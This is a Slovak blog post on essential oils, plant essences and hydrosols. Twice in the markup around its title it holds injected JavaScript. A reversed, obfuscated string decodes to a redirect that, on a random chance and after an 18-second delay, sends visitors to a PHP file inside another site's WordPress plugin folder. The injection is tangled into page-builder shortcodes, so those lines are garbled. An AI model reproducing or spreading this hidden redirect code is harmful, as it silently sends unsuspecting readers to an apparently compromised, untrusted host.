<“h1″ class="w-post-elm post_title us_custom_f5286e8b entry-title" itemprop="headline">Esencie, esenciálne oleje a iné tajomstvá) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%220.5rem%22%2C%22font-family%22%3A%22h1%22%7D%7D“]
[us_separator size=“small“]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom%22%3A%221.5rem%22%7D%7D“]

Esencie, silice, esenciálne oleje. Samé pojmy… z toľkých strán už o nich počuť. Poďme ich pochopiť, skutočne nazrieť do čarovnej prírody.
Aromatické látky, čiže esencie rastlín sa používajú už od pradávna na liečenie a prevenciu chorôb. V staroveku boli éterické oleje dokonca hodnotnejšie ako zlato. Ale pekne po poriadku.

Esencia nás sprevádza celým životom

Skutočne. Len si predstavte prechádzku lesom, kde sa zrazu cítite voľní, slobodní a v bezpečí. Zhlboka sa nadýchnete a obklopuje vás vôňa a energia mohutných stromov. Prejdite na lúku, jemné vône rozkvitnutých kvetov či ovocných stromov vám už z diaľky vyčaria úsmev na tvári. Cítite tú hojnosť a eufóriu? S pokojným srdcom a mysľou kráčate a sprevádzajú vás len radostné myšlienky.

Esenciu máte aj doma

Privoniate si ku kytici ruží, ktorú ste včera z vďaky dostali. Prekrojíte citrón, zalejete čaj, jemne dochutíte obed bazalkou. Či napečiete škoricový koláč?
Tieto nádherné vône sú súčasťou rastliny, sú jej podstatou, akoby krvou a životnou silou a nazývajú sa esencie. Rastlinke dobre slúžia ako ochrana pred dravcami, baktériami, infekciami a tiež prilákajú opeľovačov. Pozoruhodná schopnosť esencií liečiť a chrániť je teda ich neodmysliteľnou vlastnosťou. Poďme ich teda využiť aj pre svoje zdravie. Ako?

[us_separator]

Ostáva záhadou Matky Prírody, prečo niektoré rastlinky túto arómu majú, iné nie.

[us_separator]

Pre oslobodenie esencií z rastlín sa používajú rôzne formy destilácie. Destilujú sa obrovské množstvá rastlinného materiálu – z kvetov, semien, listov, stoniek, kôry a koreňov bylín, kríkov, či stromov. Stručne povedané z tých častí rastliny, ktoré ukrývajú najväčšie množstvo vzácnej esencie. A tak získame esenciálny alebo éterický olej. Fascinujúci náhľad do umenia a foriem získavania kvalitného esenciálneho oleja si prečítajte v článku tu (?3 spôsoby získania čistého esenciálneho oleja alebo prečo Nie je olej ako olej?)

A to nie je všetko. Okrem vzácneho esenciálneho oleja pri destilácii vzniká aj hydrosol. Možno skôr známy pod pojmom kvetová voda. Ja ho rada nazývam aromatická voda s liečivými benefitmi, keďže v sebe skrýva časť sily rastlinky. Tú, ktorá je rozpustná vo vode.

Aby ste získali predstavu koľko rastlinnej sily sa ukrýva v malej fľaštičke esenciálneho oleja…

[us_separator]
[us_separator]

Pochopiť neuveriteľnú silu a potenciál esenciálnych olejov je prvý krok k bezpečnému a efektívnemu používaniu. Menej je často krát viac.
Počujem, že sa pýtate, ako vlastne tie esenciálne oleje fungujú? Čo nám môžu priniesť? Len si spomeňte na tie úžasné pocity pri prechádzke lesom, vôňu ruží…koláč, hmm. Je toho oveľa viac, spravme si čálku čaju – čerstvý mätový zo záhradky? – a čítajte ďalej

Menu